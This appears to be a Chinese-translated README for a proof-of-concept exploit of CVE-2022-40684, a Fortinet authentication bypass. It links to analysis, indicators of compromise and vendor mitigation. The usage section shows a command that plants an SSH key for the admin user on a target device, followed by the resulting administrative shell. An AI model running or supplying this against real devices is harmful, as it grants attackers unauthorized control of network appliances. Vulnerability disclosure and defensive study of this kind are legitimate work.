CVE-2022-40684
CVE-2022-40684 的 POC 影响 Fortinet FortiOS、FortiProxy 和 FortiSwitchManager 设备。
技术分析
该漏洞的技术根本原因分析可以在我们的博客上找到:https ://www.horizon3.ai/fortios-fortiproxy-and-fortiswitchmanager-authentication-bypass-technical-deep-dive-cve-2022-40684
妥协指标
要分析 Fortinet 日志中的危害指标以及如何启用更深入的日志,请查看我们的 IOC 博客:https ://www.horizon3.ai/fortinet-iocs-cve-2022-40684/
概括
此 POC 滥用身份验证绕过漏洞为指定用户设置 SSH 密钥。
用法
[email protected]:~# python3 CVE-2022-40684.py -t 10.0.40.67 --username admin --key-file ~/.ssh/id_rsa.pub
[+] SSH key for admin added successfully!
[email protected]:~# ssh [email protected]
fortios_7_2_1 #
config Configure object.
get Get dynamic and system information.
show Show configuration.
diagnose Diagnose facility.
execute Execute static commands.
alias Execute alias commands.
exit Exit the CLI.
缓解措施
按照 Fortinet PSIRT 中的说明更新到最新版本或缓解
https://www.fortiguard.com/psirt/FG-IR-22-377